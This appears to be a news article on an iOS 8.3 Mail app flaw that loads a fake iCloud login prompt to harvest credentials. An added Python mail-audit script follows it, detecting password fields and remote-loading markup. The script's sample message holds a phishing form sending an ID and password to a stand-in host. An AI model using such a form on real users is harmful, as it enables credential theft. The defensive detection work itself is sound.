Beware of iCloud login prompts: A new security flaw lets hackers steal your info

Apple’s mobile operating system iOS has a reputation for being more secure than Android, but recently, it seems that more hackers are targeting iPhone and iPad users. A GitHub user by the name of Jansoucek discovered yet another iOS vulnerability back in January and reported it to Apple. The friendly hacker demonstrated how attack code can be used in the Mail app to steal users’ iCloud logins and other sensitive information.

Apparently, ever since Apple released iOS 8.3 in early April, the Mail app has stopped removing potentially dangerous HTML code from the emails users receive. One tag instructs the Mail app to download and execute code remotely. The command then brings up a form box, which mimics the appearance of an iCloud login request box. If the user logs in, the hacker can then steal his or her iCloud account user name and password. With these two pieces of information, the hacker can steal other personal information stored in iCloud.

Proof-of-concept: iOS 8.3 Mail.app attack

“This bug allows remote HTML content to be loaded, replacing the content of the original email message,” Jansoucek wrote. “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS [cascading style sheets].”

To make matters worse, the vulnerability places a tracking cookie in the Mail app, so that the code doesn’t execute the same command every time the infected email is opened in the app. That way, the user doesn’t get suspicious of the message or notice the link between that specific email and the iCloud login prompt. Additionally, the hacker can change the code at any time to access different information.

Luckily, there is a trick iOS users can employ to protect themselves from the hack. Although the malicious code does a pretty good imitation of the iCloud login box, it isn’t perfect. First off, the box asks for both your Apple ID and your password, while iCloud typically asks for only your password and already displays your user name. Secondly, the box isn’t modal, so the background doesn’t fade and the screen isn’t static when the prompt comes up. Additionally, keyboard suggestions remain activated, which is something that never happens when you receive an iCloud prompt on iOS.

Of course, these differences are subtle, and many won’t notice them. Apple has yet to respond, but hopefully the patch will come soon. Until then, the next time you see an iCloud login request, check for these telltale signs to ensure that you’re not being hacked.
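Because the flaw comes down to HTML that the Mail app no longer strips, the same check can be made before a message ever reaches the phone. The following is an added example, not code from the article or from the proof of concept: a mail-gateway style audit that flags HTML parts containing a password field or remote-loading markup. The tag list, the function names and the sample message are assumptions of this example, since the article does not name the tag involved.

```python
import email
from email import policy
from html.parser import HTMLParser

# Tags that fetch or navigate to remote content without JavaScript. The article
# does not name the tag involved, so this set is an assumption of the example.
REMOTE_TAGS = {"iframe", "frame", "object", "embed"}

class MailHtmlAudit(HTMLParser):
    """Records markup that a sanitizing mail client would be expected to strip."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta-refresh")
        elif tag in REMOTE_TAGS and (a.get("src") or a.get("data")):
            self.findings.append("remote-" + tag)
        elif tag == "form":
            self.findings.append("form")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password-input")

def audit_message(raw: bytes) -> list:
    """Return findings for every text/html part of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            parser = MailHtmlAudit()
            parser.feed(part.get_content())
            parser.close()
            findings.extend(parser.findings)
    return findings

def should_quarantine(findings) -> bool:
    # A password field or a forced reload inside an email body is the signal.
    return "password-input" in findings or "meta-refresh" in findings

# Constructed sample message (not from the article or the proof of concept).
SAMPLE = b"""From: sender@example.com
To: user@example.com
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<form action="https://collector.example/submit">
<input type="text" name="id"><input type="password" name="pw"></form>
"""

if __name__ == "__main__":
    print(audit_message(SAMPLE), should_quarantine(audit_message(SAMPLE)))
```

Legitimate mail has no reason to carry a password field, so a hit on `password-input` is a low-noise rule for quarantine or for rewriting the part to plain text.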

Malarie Gokey
Former Digital Trends Contributor
As DT's Mobile Editor, Malarie runs the Mobile and Wearables sections, which cover smartphones, tablets, smartwatches, and…